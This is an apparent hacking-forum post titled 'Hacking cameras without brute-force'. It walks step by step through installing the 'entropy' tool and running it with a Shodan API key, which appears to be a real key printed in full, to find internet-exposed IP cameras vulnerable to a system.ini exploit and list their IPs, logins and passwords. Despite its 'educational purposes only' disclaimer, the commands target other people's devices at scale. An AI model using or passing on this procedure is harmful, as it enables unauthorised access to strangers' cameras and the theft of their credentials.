Hacking cameras without brute-force

Mutt

Professional
Messages
1,457
Reaction score
1,266
Points
113
f6244e36-5a79-4be3-a794-cb77d46feb77.jpeg

This article is for educational purposes only and does not call for action!

To test MY camera for resistance to the system.ini exploit, I used Kali Linux (although not only it is possible).

First, clone the entropy repository:
Code:
git clone https://github.com/entynetproject/entropy.git

Go to the directory with the utility:
Code:
cd entropy

We assign the rights to run the installer:
Code:
chmod + x install.sh

And install the utility itself:
Code:
./install.sh

But the utility did not want to work for me without installing the dependencies, so I had to enter such a command. In your case, you may have to enter pip or pip2if there are errors. It depends on the version of python you will be using.
Code:
pip3 install -r requirements.txt

Now checking in shodan, and get an API key.
After that, we launch the utility itself, specifying our Shodan API key:[/B]
Code:
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T"

And to filter the output (so that we only display a list of vulnerable cameras), we will use the grep utility:
Code:
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T" | grep [+]

As a result, you will see the IP, login and password of the vulnerable camera.
 
Top